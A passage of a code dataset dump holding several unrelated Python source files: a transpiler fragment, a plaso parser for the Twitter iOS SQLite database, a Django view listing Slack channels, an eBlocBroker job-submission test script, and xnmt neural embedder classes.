return_type: str = None) -> str:\n\n prefix, decorators = language_specific\n\n if is_static:\n decorators.insert(0, \"@staticmethod\")\n\n decorator_strings = map(lambda x: \"{}@{}\\n\".format(prefix, x), decorators)\n\n string_list = [\n \"{}def {}(\".format(prefix, function_name)\n ] # type: List[str]\n\n argument_strings = [] # type: List[str]\n\n for arg in arguments:\n if \"type\" in arg:\n type_string = \": {}\".format(Python3Transpiler.emit_type_name(arg[\"type\"]))\n else:\n type_string = \"\"\n\n arg_string = \"{}{}\".format(arg, type_string)\n argument_strings.append(arg_string)\n argument_string = \", \".join(argument_strings)\n string_list.append(argument_string)\n\n if return_type:\n return_type_string = \" -> {}\".format(return_type)\n else:\n return_type_string = \"\"\n\n # TODO: Add option to return.\n if leave_empty:\n string_list.append(\"):{}\\n\".format(return_type_string))\n else:\n string_list.append(\"):{}\\n{} pass\\n\\n\".format(return_type_string, prefix))\n\n return \"\".join(string_list)\n\n # TODO: Return type hint.\n @staticmethod\n def emit_type_name(type: str) -> str:\n type_hint = \"\"\n return type_hint\n\n type_mappings = MappingProxyType({\n \"int64\": \"int\",\n \"int32\": \"int\",\n \"string\": \"str\",\n \"boolean\": \"bool\",\n \"unordered_map\": \"dict\",\n \"list\": \"list\",\n \"array\": \"list\",\n \"tuple\": \"tuple\"\n })\n\n","sub_path":"transpilers/Python3Transpiler.py","file_name":"Python3Transpiler.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"309889841","text":"# -*- coding:utf-8 -*-\n\"\"\"Parser for Twitter on iOS 8+ database.\n\nSQLite database path:\n/private/var/mobile/Containers/Data/Application/Library/Caches/databases/\nSQLite database name: twitter.db\n\"\"\"\n\nfrom dfdatetime import posix_time as dfdatetime_posix_time\n\nfrom plaso.containers import events\nfrom plaso.containers import time_events\nfrom 
plaso.lib import eventdata\nfrom plaso.parsers import sqlite\nfrom plaso.parsers.sqlite_plugins import interface\n\n\nclass TwitterIOSContactEventData(events.EventData):\n \"\"\"Twitter on iOS 8+ contact event data.\n\n Attributes:\n description (str): description of the profile.\n followers_count (int): number of accounts following the contact.\n following_count (int): number of accounts the contact is following.\n following (int): 1 if the contact is following the user's account, 0 if not.\n location (str): location of the profile.\n name (str): name of the profile.\n profile_url (str): URL of the profile picture.\n screen_name (str): screen name.\n url (str): URL of the profile.\n \"\"\"\n\n DATA_TYPE = u'twitter:ios:contact'\n\n def __init__(self):\n \"\"\"Initializes event data.\"\"\"\n super(TwitterIOSContactEventData, self).__init__(data_type=self.DATA_TYPE)\n self.description = None\n self.followers_count = None\n self.following = None\n self.following_count = None\n self.location = None\n self.name = None\n self.profile_url = None\n self.screen_name = None\n self.url = None\n\n\nclass TwitterIOSStatusEventData(events.EventData):\n \"\"\"Parent class for Twitter on iOS 8+ status events.\n\n Attributes:\n favorite_count (int): number of times the status message has been favorited.\n favorited (int): value to mark status as favorite by the account.\n name (str): user's profile name.\n retweet_count (str): number of times the status message has been retweeted.\n text (str): content of the status messsage.\n user_id (int): user unique identifier.\n \"\"\"\n\n DATA_TYPE = u'twitter:ios:status'\n\n def __init__(self):\n \"\"\"Initializes event data.\"\"\"\n super(TwitterIOSStatusEventData, self).__init__(data_type=self.DATA_TYPE)\n self.favorite_count = None\n self.favorited = None\n self.name = None\n self.retweet_count = None\n self.text = None\n self.user_id = None\n\n\nclass TwitterIOSPlugin(interface.SQLitePlugin):\n \"\"\"Parser for Twitter on iOS 8+ database.\"\"\"\n\n NAME = u'twitter_ios'\n DESCRIPTION = u'Parser for Twitter on iOS 8+ database'\n\n QUERIES = [\n ((u'SELECT createdDate, updatedAt, screenName, name, profileImageUrl,'\n u'location, description, url, following, followersCount, followingCount'\n u' FROM Users ORDER BY createdDate'), u'ParseContactRow'),\n ((u'SELECT Statuses.date AS date, Statuses.text AS text, Statuses.userId '\n u'AS user_id, Users.name AS name, Statuses.retweetCount AS '\n u'retweetCount, Statuses.favoriteCount AS favoriteCount, '\n u'Statuses.favorited AS favorited, Statuses.updatedAt AS updatedAt '\n u'FROM Statuses LEFT join Users ON Statuses.userId = Users.id ORDER '\n u'BY date'), u'ParseStatusRow')]\n\n REQUIRED_TABLES = frozenset([\n u'Lists', u'MyRetweets', u'StatusesShadow', u'UsersShadow',\n u'ListsShadow', u'Statuses', u'Users'])\n\n def ParseContactRow(self, parser_mediator, row, query=None, **unused_kwargs):\n \"\"\"Parses a contact row from the database.\n\n Args:\n parser_mediator (ParserMediator): mediates interactions between parsers\n and other components, such as storage and dfvfs.\n row (sqlite3.Row): row resulting from query.\n query (Optional[str]): query.\n \"\"\"\n # Note that pysqlite does not accept a Unicode string in row['string'] and\n # will raise \"IndexError: Index must be int or string\".\n\n event_data = TwitterIOSContactEventData()\n event_data.description = row['description']\n event_data.followers_count = row['followersCount']\n event_data.following = row['following']\n event_data.following_count = 
row['followingCount']\n event_data.location = row['location']\n event_data.name = row['name']\n event_data.profile_url = row['profileImageUrl']\n event_data.query = query\n event_data.screen_name = row['screenName']\n event_data.url = row['url']\n\n timestamp = row['createdDate']\n if timestamp:\n # Convert the floating point value to an integer.\n timestamp = int(timestamp)\n date_time = dfdatetime_posix_time.PosixTime(timestamp=timestamp)\n event = time_events.DateTimeValuesEvent(\n date_time, eventdata.EventTimestamp.CREATION_TIME)\n parser_mediator.ProduceEventWithEventData(event, event_data)\n\n timestamp = row['updatedAt']\n if timestamp:\n # Convert the floating point value to an integer.\n timestamp = int(timestamp)\n date_time = dfdatetime_posix_time.PosixTime(timestamp=timestamp)\n event = time_events.DateTimeValuesEvent(\n date_time, eventdata.EventTimestamp.UPDATE_TIME)\n parser_mediator.ProduceEventWithEventData(event, event_data)\n\n def ParseStatusRow(self, parser_mediator, row, query=None, **unused_kwargs):\n \"\"\"Parses a contact row from the database.\n\n Args:\n parser_mediator (ParserMediator): mediates interactions between parsers\n and other components, such as storage and dfvfs.\n row (sqlite3.Row): row resulting from query.\n query (Optional[str]): query.\n \"\"\"\n # Note that pysqlite does not accept a Unicode string in row['string'] and\n # will raise \"IndexError: Index must be int or string\".\n\n event_data = TwitterIOSStatusEventData()\n event_data.favorite_count = row['favoriteCount']\n event_data.favorited = row['favorited']\n event_data.name = row['name']\n event_data.query = query\n event_data.retweet_count = row['retweetCount']\n event_data.text = row['text']\n event_data.user_id = row['user_id']\n\n timestamp = row['date']\n if timestamp:\n # Convert the floating point value to an integer.\n timestamp = int(timestamp)\n date_time = dfdatetime_posix_time.PosixTime(timestamp=timestamp)\n event = time_events.DateTimeValuesEvent(\n date_time, eventdata.EventTimestamp.CREATION_TIME)\n parser_mediator.ProduceEventWithEventData(event, event_data)\n\n timestamp = row['updatedAt']\n if timestamp:\n # Convert the floating point value to an integer.\n timestamp = int(timestamp)\n date_time = dfdatetime_posix_time.PosixTime(timestamp=timestamp)\n event = time_events.DateTimeValuesEvent(\n date_time, eventdata.EventTimestamp.UPDATE_TIME)\n parser_mediator.ProduceEventWithEventData(event, event_data)\n\n\nsqlite.SQLiteParser.RegisterPlugin(TwitterIOSPlugin)\n","sub_path":"plaso/parsers/sqlite_plugins/twitter_ios.py","file_name":"twitter_ios.py","file_ext":"py","file_size_in_byte":6683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"600520200","text":"import requests\n\nfrom chatrender.conf import settings\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.shortcuts import render\n\n\n@staff_member_required\ndef channels(request, chat_type):\n response = requests.get('{}?chat_type={}'.format(\n settings.SLACKCHAT_CHANNEL_ENDPOINT,\n chat_type,\n ))\n channels = response.json()\n return render(\n request,\n 'chatrender/channel_list.html',\n context={\"channels\": channels, \"chat_type\": chat_type}\n )\n","sub_path":"chatrender/views/channels.py","file_name":"channels.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"391486515","text":"#!/usr/bin/env python3\n\nimport math\nimport 
time\nfrom os.path import expanduser\nfrom random import randint\n\nimport eblocbroker.Contract as Contract\nfrom imports import connect_to_web3\nfrom utils import is_transaction_passed, sleep_timer\n\nhome = expanduser(\"~\")\nw3 = connect_to_web3()\nEbb = Contract.eblocbroker\n\n\nf = open(f\"{home}/TESTS/accountPassword.txt\", \"r\") # password read from the file\naccountPassword = f.read().strip()\nf.close()\n\n\ndef log(my_string, path, print_flag=0):\n if print_flag == 0:\n print(my_string)\n\n f = open(f\"{path}/clientOutput.txt\", \"a\")\n f.write(my_string + \"\\n\")\n f.close()\n\n\ndef testFunc(path, readTest, testType, providerID, cacheType):\n with open(path + \"/\" + readTest) as test:\n for idx, line in enumerate(test):\n if idx != 0:\n log(\"\\n------------------------------------------\", path)\n\n eudatFlag = 0\n if testType == \"eudat-nasa\":\n cloudStorageID = 1\n eudatFlag = 0\n elif testType == \"eudat-nas\":\n cloudStorageID = 1\n eudatFlag = 1\n elif testType == \"ipfs\":\n cloudStorageID = 0\n elif testType == \"gdrive\":\n cloudStorageID = 4\n\n dataTransferIn = 10\n dataTransferOut = 10\n gasStorageHour = 0\n\n jobKey = line.rstrip().split(\" \")\n sourceCodeHash = jobKey[5] # time to sleep in seconds\n sleepTime = jobKey[6] # time to sleep in seconds\n block_number = Ebb.get_block_number()\n\n log(\n \"Job: \" + str(idx + 1) + \"| Current Time: \" + time.ctime() + \"| BlockNumber: \" + str(block_number),\n path,\n )\n log(\"Nasa Submit range: \" + jobKey[3] + \" \" + jobKey[4], path)\n log(\"Sleep Time to submit next job: \" + sleepTime, path)\n log(\"Sourcecode Hash=\" + sourceCodeHash, path)\n jobKey_ = str(jobKey[0])\n coreNum = int(jobKey[2])\n if eudatFlag == 0:\n coreMinuteGas = int(math.ceil(float(jobKey[1]) / 60))\n log(\"RunTimeInMinutes: \" + str(coreMinuteGas), path)\n else:\n log(\"RunTimeInMinutes: \" + \"360\", path)\n coreMinuteGas = 360 # 6 hours for nasEUDAT simulation test.\n\n account_id = randint(0, 9)\n output = w3.personal.unlockAccount(\n w3.eth.accounts[account_id], accountPassword\n ) # unlocks the selected account in case if unlocks over time\n log(\n \"AccountID:\" + str(account_id) + \" (\" + w3.eth.accounts[account_id] + \") is unlocked=>\" + str(output),\n path,\n )\n log(\n \"hash=\"\n + jobKey[0]\n + \"| TimeToRun=\"\n + str(coreMinuteGas)\n + \"| TimeToRunSeconds=\"\n + str(math.ceil(float(jobKey[1])))\n + \"| Core=\"\n + str(coreNum)\n + \"| account_id=\"\n + str(account_id),\n path,\n )\n\n log(\n \"submit_job(\"\n + providerID\n + \", \"\n + jobKey_\n + \", \"\n + str(coreNum)\n + \", \"\n + str(coreMinuteGas)\n + \", \"\n + str(dataTransferIn)\n + \", \"\n + str(dataTransferOut)\n + \", \"\n + str(cloudStorageID)\n + \", \"\n + jobKey_\n + \", \"\n + str(gasStorageHour)\n + \", \"\n + str(account_id)\n + \")\",\n path,\n )\n\n provider = None\n core_list = None\n run_time = None\n cloudStorageID = None\n sourceCodeHash_list = None\n cacheHour_list = None\n account_id = None\n job_price = None\n output = Ebb.submit_job(\n provider,\n jobKey,\n core_list,\n run_time,\n dataTransferIn,\n dataTransferOut,\n cloudStorageID,\n sourceCodeHash_list,\n cacheType,\n cacheHour_list,\n account_id,\n job_price,\n )\n\n # # ret = submit_job(providerID, jobKey_, int(coreNum), coreMinuteGas, dataTransferIn, dataTransferOut, cloudStorageID, sourceCodeHash, cacheType, gasStorageHour, account_id) # delete\n # success = None\n # if not success:\n # log(output, path, 0)\n # else:\n # tx_hash = output[0]\n # log(\"tx_hash:\" + tx_hash, path, 0)\n 
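# NOTE (editor's sketch, assumption): in a live run, tx_hash would presumably be\n            # unpacked from the submit_job result rather than stubbed to None below,\n            # e.g. tx_hash = output[0] (as in the commented lines above) before\n            # w3.eth.getTransactionReceipt(tx_hash) is called.\n            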
# log(\"computationalCost:\" + output[1], path, 0)\n # log(\"storageCost:\" + output[2], path, 0)\n # log(\"cacheCost:\" + output[3], path, 0)\n # log(\"dataTransferCost:\" + output[4], path, 0)\n # log(\"job_price:\" + output[5], path, 1)\n tx_hash = None\n txFile = open(path + \"/\" + providerID + \".txt\", \"a\")\n txFile.write(output[0] + \" \" + str(account_id) + \"\\n\")\n txFile.close()\n sleep_timer(int(sleepTime))\n receipt = w3.eth.getTransactionReceipt(tx_hash)\n if receipt:\n output = is_transaction_passed(w3, tx_hash)\n log(f\"tx status:{output}\", path)\n else:\n log(\"tx is not deployed yet\", path)\n\n log(\"END\", path)\n log(\".\", path)\n f.close()\n","sub_path":"test/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":5697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"71284995","text":"import numbers\nimport functools\nimport collections\n\nfrom typing import Any, Optional, Union\n\nimport numpy as np\nimport dynet as dy\n\nimport xnmt.param_initializers as pinit\nimport xnmt.sent as sent\nimport xnmt.vocabs as vocabs\nimport xnmt.input_readers as input_readers\nimport xnmt.batchers as batchers\nimport xnmt.events as events\nimport xnmt.expression_seqs as expression_seqs\nimport xnmt.modelparts.transforms as transforms\nimport xnmt.param_collections as param_collections\nimport xnmt.seq_composer as seq_composer\n\nfrom xnmt import logger\nfrom xnmt.persistence import bare, Path, Ref, Serializable, serializable_init\n\n\nclass Embedder(object):\n \"\"\"\n An embedder takes in word IDs and outputs continuous vectors.\n\n This can be done on a word-by-word basis, or over a sequence.\n \"\"\"\n\n def embed(self, word: Any) -> dy.Expression:\n \"\"\"Embed a single word.\n\n Args:\n word: This will generally be an integer word ID, but could also be something like a string. It could\n also be batched, in which case the input will be a :class:`xnmt.batcher.Batch` of integers or other things.\n\n Returns:\n Expression corresponding to the embedding of the word(s).\n \"\"\"\n raise NotImplementedError('embed must be implemented in Embedder subclasses')\n\n def embed_sent(self, x: Any) -> expression_seqs.ExpressionSequence:\n \"\"\"Embed a full sentence worth of words. 
By default, just do a for loop.\n\n    Args:\n      x: This will generally be a list of word IDs, but could also be a list of strings or some other format.\n         It could also be batched, in which case it will be a (possibly masked) :class:`xnmt.batcher.Batch` object\n\n    Returns:\n      An expression sequence representing vectors of each word in the input.\n    \"\"\"\n    # single mode\n    if not batchers.is_batched(x):\n      expr = expression_seqs.ExpressionSequence(expr_list=[self.embed(word) for word in x])\n    # minibatch mode\n    elif type(self) == LookupEmbedder:\n      embeddings = []\n      for word_i in range(x.sent_len()):\n        batch = batchers.mark_as_batch([single_sent[word_i] for single_sent in x])\n        embeddings.append(self.embed(batch))\n      expr = expression_seqs.ExpressionSequence(expr_list=embeddings, mask=x.mask)\n    else:\n      assert type(x[0]) == sent.SegmentedSentence, \"Need to use CharFromWordTextReader for non-standard embeddings.\"\n      embeddings = []\n      all_embeddings = []\n      for sentence in x:\n        embedding = []\n        for i in range(sentence.len_unpadded()):\n          embed_word = self.embed(sentence.words[i])\n          embedding.append(embed_word)\n          all_embeddings.append(embed_word)\n        embeddings.append(embedding)\n      # Useful when using dy.autobatch\n      dy.forward(all_embeddings)\n      all_embeddings.clear()\n      # Pad the results\n      expr = batchers.pad_embedding(embeddings)\n\n    return expr\n\n\n  def choose_vocab(self,\n                   vocab: vocabs.Vocab,\n                   yaml_path: Path,\n                   src_reader: input_readers.InputReader,\n                   trg_reader: input_readers.InputReader) -> vocabs.Vocab:\n    \"\"\"Choose the vocab for the embedder based on the passed arguments\n\n    This is done in order of priority of vocab, model+yaml_path\n\n    Args:\n      vocab: If None, try to obtain from ``src_reader`` or ``trg_reader``, depending on the ``yaml_path``\n      yaml_path: Path of this embedder in the component hierarchy. Automatically determined when deserializing the YAML model.\n      src_reader: Model's src_reader, if exists and unambiguous.\n      trg_reader: Model's trg_reader, if exists and unambiguous.\n\n    Returns:\n      chosen vocab\n    \"\"\"\n    if vocab is not None:\n      return vocab\n    elif \"src_embedder\" in yaml_path:\n      if src_reader is None or src_reader.vocab is None:\n        raise ValueError(\"Could not determine src_embedder's vocabulary. Please set its vocab member explicitly, or specify the vocabulary of src_reader ahead of time.\")\n      return src_reader.vocab\n    elif \"embedder\" in yaml_path or \"output_projector\" in yaml_path:\n      if trg_reader is None or trg_reader.vocab is None:\n        raise ValueError(\"Could not determine trg_embedder's vocabulary. Please set its vocab member explicitly, or specify the vocabulary of trg_reader ahead of time.\")\n      return trg_reader.vocab\n    else:\n      raise ValueError(\"Attempted to determine vocab of {} (path: {}), but path was not src_embedder, trg_embedder, or output_projector, so it could not determine what part of the model to use. Please set vocab_size or vocab explicitly.\".format(self.__class__, yaml_path))\n\n  def choose_vocab_size(self,\n                        vocab_size: numbers.Integral,\n                        vocab: vocabs.Vocab,\n                        yaml_path: Path,\n                        src_reader: input_readers.InputReader,\n                        trg_reader: input_readers.InputReader) -> int:\n    \"\"\"Choose the vocab size for the embedder based on the passed arguments\n\n    This is done in order of priority of vocab_size, vocab, model+yaml_path\n\n    Args:\n      vocab_size: vocab size or None\n      vocab: vocab or None\n      yaml_path: Path of this embedder in the component hierarchy. 
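(For example, a hypothetical path such as \"model.src_embedder\" would select the src_reader vocabulary in the branch below.) 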
Automatically determined when YAML-deserializing.\n src_reader: Model's src_reader, if exists and unambiguous.\n trg_reader: Model's trg_reader, if exists and unambiguous.\n\n Returns:\n chosen vocab size\n \"\"\"\n if vocab_size is not None:\n return vocab_size\n elif vocab is not None:\n return len(vocab)\n elif \"src_embedder\" in yaml_path:\n if src_reader is None or getattr(src_reader,\"vocab\",None) is None:\n raise ValueError(\"Could not determine src_embedder's size. \"\n \"Please set its vocab_size or vocab member explicitly, or specify the vocabulary of src_reader ahead of time.\")\n return len(src_reader.vocab)\n elif \"embedder\" in yaml_path or \"output_projector\" in yaml_path:\n if trg_reader is None or trg_reader.vocab is None:\n raise ValueError(\"Could not determine target embedder's size. \"\n \"Please set its vocab_size or vocab member explicitly, or specify the vocabulary of trg_reader ahead of time.\")\n return len(trg_reader.vocab)\n else:\n raise ValueError(f\"Attempted to determine vocab size of {self.__class__} (path: {yaml_path}), \"\n f\"but path was not src_embedder, decoder.embedder, or output_projector, so it could not determine what part of the model to use. \"\n f\"Please set vocab_size or vocab explicitly.\")\n\n\nclass WordEmbedder(Embedder):\n \"\"\"\n Word embeddings via full matrix.\n\n Args:\n emb_dim: embedding dimension\n weight_noise: apply Gaussian noise with given standard deviation to embeddings\n fix_norm: fix the norm of word vectors to be radius r, see https://arxiv.org/abs/1710.01329\n \"\"\"\n\n @events.register_xnmt_handler\n def __init__(self,\n emb_dim: int,\n weight_noise: float,\n fix_norm: Optional[float] = None):\n self.fix_norm = fix_norm\n self.weight_noise = weight_noise\n self.emb_dim = emb_dim\n self.train = True\n\n @events.handle_xnmt_event\n def on_set_train(self, val: bool) -> None:\n self.train = val\n\n def embed(self, x: Union[batchers.Batch, numbers.Integral]) -> dy.Expression:\n \"\"\"\n Embed a single word in a sentence.\n :param x: A word id.\n :return: Embedded word.\n \"\"\"\n ret = self._embed_word(x, batchers.is_batched(x))\n ## Applying Fix normalization\n if self.fix_norm is not None:\n ret = dy.cdiv(ret, dy.l2_norm(ret)) * self.fix_norm\n ## Weight noise only when training\n if self.train and self.weight_noise > 0.0:\n ret = dy.noise(ret, self.weight_noise)\n return ret\n\n def _embed_word(self, word, is_batched):\n raise NotImplementedError()\n\n\nclass LookupEmbedder(WordEmbedder, transforms.Linear, Serializable):\n\n yaml_tag = '!LookupEmbedder'\n\n @serializable_init\n def __init__(self,\n emb_dim: int = Ref(\"exp_global.default_layer_dim\"),\n vocab_size: Optional[int] = None,\n vocab: Optional[vocabs.Vocab] = None,\n yaml_path: Path = Path(''),\n src_reader: Optional[input_readers.InputReader] = Ref(\"model.src_reader\", default=None),\n trg_reader: Optional[input_readers.InputReader] = Ref(\"model.trg_reader\", default=None),\n is_dense: bool = False,\n param_init: pinit.ParamInitializer = Ref(\"exp_global.param_init\", default=bare(pinit.GlorotInitializer)),\n bias_init: pinit.ParamInitializer = Ref(\"exp_global.bias_init\", default=bare(pinit.ZeroInitializer)),\n init_fastext: Optional[str] = None,\n weight_noise: float = Ref(\"exp_global.weight_noise\", default=0.0),\n fix_norm: Optional[float] = None):\n super().__init__(emb_dim=emb_dim, weight_noise=weight_noise, fix_norm=fix_norm)\n # Embedding Parameters\n pcol = param_collections.ParamManager.my_params(self)\n self.vocab_size = 
self.choose_vocab_size(vocab_size, vocab, yaml_path, src_reader, trg_reader)\n emb_mtr_dim = (self.vocab_size, self.emb_dim)\n\n if init_fastext is not None:\n logger.info(\"Setting Dense to False because of init_fastext\")\n is_dense = False\n\n if not is_dense:\n if init_fastext is not None:\n self.embeddings = pcol.lookup_parameters_from_numpy(self._read_fasttext_embeddings(vocab, init_fastext))\n else:\n self.embeddings = pcol.add_lookup_parameters(emb_mtr_dim, init=param_init.initializer(emb_mtr_dim, is_lookup=True))\n else:\n self.embeddings = pcol.add_parameters(emb_mtr_dim, init=param_init.initializer(emb_mtr_dim, is_lookup=True))\n self.bias = pcol.add_parameters((self.vocab_size,), init=bias_init.initializer((self.vocab_size,)))\n\n # Model States\n self.is_dense = is_dense\n self.train = False\n self.save_processed_arg(\"vocab_size\", self.vocab_size)\n\n def _embed_word(self, word, is_batched):\n if is_batched:\n embedding = dy.pick_batch(self.embeddings, word) if self.is_dense else self.embeddings.batch(word)\n else:\n embedding = dy.pick(self.embeddings, index=word) if self.is_dense else self.embeddings[word]\n return embedding\n\n def transform(self, input_expr: dy.Expression) -> dy.Expression:\n if self.is_dense:\n w = dy.parameter(self.embeddings)\n b = dy.parameter(self.bias)\n else:\n raise NotImplementedError(\"Non dense embedder transform is not implemented yet.\")\n\n return dy.affine_transform([b, w, input_expr])\n\n def _read_fasttext_embeddings(self, vocab: vocabs.Vocab, init_fastext):\n \"\"\"\n Reads FastText embeddings from a file. Also prints stats about the loaded embeddings for sanity checking.\n\n Args:\n vocab: a `Vocab` object containing the vocabulary for the experiment\n embeddings_file_handle: A file handle on the embeddings file. 
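(Illustrative layout, matching the parsing below: a header line such as \"2000000 300\", then one \"word v1 v2 ... v300\" row per token.) 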
The embeddings must be in FastText text\n format.\n Returns:\n tuple: A tuple of (total number of embeddings read, # embeddings that match vocabulary words, # vocabulary words\n without a matching embedding, embeddings array).\n \"\"\"\n with open(init_fastext, encoding='utf-8') as embeddings_file_handle:\n _, dimension = next(embeddings_file_handle).split()\n if int(dimension) != self.emb_dim:\n raise Exception(f\"An embedding size of {self.emb_dim} was specified, but the pretrained embeddings have size {dimension}\")\n\n # Poor man's Glorot initializer for missing embeddings\n bound = np.sqrt(6/(self.vocab_size + self.emb_dim))\n\n total_embs = 0\n in_vocab = 0\n missing = 0\n\n embeddings = np.empty((self.vocab_size, self.emb_dim), dtype='float')\n found = np.zeros(self.vocab_size, dtype='bool_')\n\n for line in embeddings_file_handle:\n total_embs += 1\n word, vals = line.strip().split(' ', 1)\n if word in vocab.w2i:\n in_vocab += 1\n index = vocab.w2i[word]\n embeddings[index] = np.fromstring(vals, sep=\" \")\n found[index] = True\n\n for i in range(self.vocab_size):\n if not found[i]:\n missing += 1\n embeddings[i] = np.random.uniform(-bound, bound, self.emb_dim)\n\n logger.info(f\"{in_vocab} vocabulary matches out of {total_embs} total embeddings; \"\n f\"{missing} vocabulary words without a pretrained embedding out of {self.vocab_size}\")\n\n return embeddings\n\n\nclass BagOfWordsEmbedder(WordEmbedder, Serializable):\n\n yaml_tag = '!BagOfWordsEmbedder'\n ONE_MB = 1000 * 1024\n\n @serializable_init\n def __init__(self,\n emb_dim = Ref(\"exp_global.default_layer_dim\"),\n ngram_vocab: vocabs.Vocab = None,\n word_vocab: Optional[vocabs.Vocab] = Ref(\"model.src_reader.vocab\", default=None),\n char_vocab: Optional[vocabs.Vocab] = Ref(\"model.src_reader.char_vocab\", default=None),\n ngram_size: int = 1,\n transform: Optional[transforms.Transform] = None,\n include_lower_ngrams: bool = True,\n weight_noise: float = Ref(\"exp_global.weight_noise\", default=0.0),\n fix_norm: Optional[float] = None):\n super().__init__(emb_dim=emb_dim, weight_noise=weight_noise, fix_norm=fix_norm)\n self.transform = self.add_serializable_component(\"transform\", transform,\n lambda: transforms.NonLinear(input_dim=ngram_vocab.vocab_size(),\n output_dim=emb_dim,\n activation='relu'))\n self.word_vocab = word_vocab\n self.char_vocab = char_vocab\n self.ngram_vocab = ngram_vocab\n self.ngram_size = ngram_size\n self.include_lower_ngrams = include_lower_ngrams\n\n @functools.lru_cache(maxsize=ONE_MB)\n def to_ngram_stats(self, word):\n word_vector = collections.defaultdict(int)\n\n if self.word_vocab is not None:\n chars = self.word_vocab[word]\n elif self.char_vocab is not None:\n chars = \"\".join([self.char_vocab[c] for c in word if c != self.char_vocab.PAD and c != self.char_vocab.SS])\n else:\n raise ValueError(\"Either word vocab or char vocab should not be None\")\n\n # This offset is used to generate bag-of-words for a specific ngrams only\n # For example 3-grams which is used in some papers\n offset = self.ngram_size-1 if not self.include_lower_ngrams else 0\n\n # Fill in word_vecs\n for i in range(len(chars)):\n for j in range(i+offset, min(i+self.ngram_size, len(chars))):\n word_vector[chars[i:j+1]] += 1\n\n return word_vector\n\n def _embed_word(self, segmented_word, is_batched):\n if self.word_vocab is not None:\n ngram_stats = self.to_ngram_stats(segmented_word.word)\n elif self.char_vocab is not None:\n ngram_stats = self.to_ngram_stats(segmented_word.chars)\n else:\n raise ValueError(\"Either 
word vocab or char vocab should not be None\")\n\n not_in = [key for key in ngram_stats.keys() if key not in self.ngram_vocab.w2i]\n for key in not_in:\n ngram_stats.pop(key)\n\n if len(ngram_stats) > 0:\n ngrams = [self.ngram_vocab.convert(ngram) for ngram in ngram_stats.keys()]\n counts = list(ngram_stats.values())\n else:\n ngrams = [self.ngram_vocab.UNK]\n counts = [1]\n\n input_tensor = dy.sparse_inputTensor([ngrams], counts, (self.ngram_vocab.vocab_size(),))\n # Note: If one wants to use CHARAGRAM embeddings, use NonLinear with Relu.\n return self.transform.transform(input_tensor)\n\n\nclass CharCompositionEmbedder(WordEmbedder, Serializable):\n\n yaml_tag = '!CharCompositionEmbedder'\n\n @serializable_init\n def __init__(self,\n char_vocab: Optional[vocabs.CharVocab] = Ref(\"model.src_reader.char_vocab\", default=None),\n vocab_size: Optional[int] = None,\n emb_dim: int = Ref(\"exp_global.default_layer_dim\"),\n weight_noise: float = Ref(\"exp_global.weight_noise\", default=0.0),\n param_init: pinit.ParamInitializer = Ref(\"exp_global.param_init\", default=bare(pinit.GlorotInitializer)),\n bias_init: pinit.ParamInitializer = Ref(\"exp_global.bias_init\", default=bare(pinit.ZeroInitializer)),\n composer: seq_composer.SequenceComposer = bare(seq_composer.SumComposer),\n fix_norm: Optional[float] = None):\n super().__init__(emb_dim=emb_dim, weight_noise=weight_noise, fix_norm=fix_norm)\n self.composer = composer\n # Embedding Parameters\n pcol = param_collections.ParamManager.my_params(self)\n self.vocab_size = self.choose_vocab_size(vocab_size, char_vocab, '', None, None)\n self.embeddings = pcol.add_lookup_parameters((self.vocab_size, self.emb_dim), init=param_init.initializer((self.vocab_size, self.emb_dim), is_lookup=True))\n # Model States\n self.train = False\n self.save_processed_arg(\"vocab_size\", self.vocab_size)\n\n\n def _embed_word(self, word: sent.SegmentedWord, is_batched: bool = False):\n char_embeds = self.embeddings.batch(batchers.mark_as_batch(word.chars))\n\n char_embeds = [dy.pick_batch_elem(char_embeds, i) for i in range(len(word.chars))]\n return self.composer.compose(char_embeds)\n\n\nclass CompositeEmbedder(Embedder, Serializable):\n yaml_tag = '!CompositeEmbedder'\n\n @serializable_init\n def __init__(self, embedders):\n self.embedders = embedders\n\n def embed_sent(self, x: Any):\n embeddings = [embedder.embed_sent(x) for embedder in self.embedders]\n ret = []\n for j in range(len(embeddings[0])):\n ret.append(dy.esum([embeddings[i][j] for i in range(len(embeddings))]))\n return expression_seqs.ExpressionSequence(expr_list=ret, mask=embeddings[0].mask)\n\n def embed(self, word: Any) -> dy.Expression:\n def select_word(_word, _embedder):\n if type(_word) == sent.SegmentedWord and type(_embedder) == LookupEmbedder:\n _word = _word.word\n return _word\n\n return dy.esum([embedder.embed(select_word(word, embedder)) for embedder in self.embedders])\n\n\nclass NoopEmbedder(Embedder, Serializable):\n \"\"\"\n This embedder performs no lookups but only passes through the inputs.\n\n Normally, the input is a Sentence object, which is converted to an expression.\n\n Args:\n emb_dim: Size of the inputs\n \"\"\"\n\n yaml_tag = '!NoopEmbedder'\n\n @serializable_init\n def __init__(self, emb_dim: Optional[numbers.Integral]) -> None:\n self.emb_dim = emb_dim\n\n def embed(self, x: Union[np.ndarray, list]) -> dy.Expression:\n return dy.inputTensor(x, batched=batchers.is_batched(x))\n\n def embed_sent(self, x: sent.Sentence) -> expression_seqs.ExpressionSequence:\n # TODO 
refactor: seems a bit too many special cases that need to be distinguished\n    batched = batchers.is_batched(x)\n    first_sent = x[0] if batched else x\n    if hasattr(first_sent, \"get_array\"):\n      if not batched:\n        return expression_seqs.LazyNumpyExpressionSequence(lazy_data=x.get_array())\n      else:\n        return expression_seqs.LazyNumpyExpressionSequence(lazy_data=batchers.mark_as_batch([s for s in x]), mask=x.mask)\n    else:\n      if not batched:\n        embeddings = [self.embed(word) for word in x]\n      else:\n        embeddings = []\n        for word_i in range(x.sent_len()):\n          embeddings.append(self.embed(batchers.mark_as_batch([single_sent[word_i] for single_sent in x])))\n      return expression_seqs.ExpressionSequence(expr_list=embeddings, mask=x.mask)\n\n\nclass PositionEmbedder(Embedder, Serializable):\n\n  yaml_tag = '!PositionEmbedder'\n\n  @serializable_init\n  def __init__(self,\n               max_pos: numbers.Integral,\n               emb_dim: numbers.Integral = Ref(\"exp_global.default_layer_dim\"),\n               param_init: 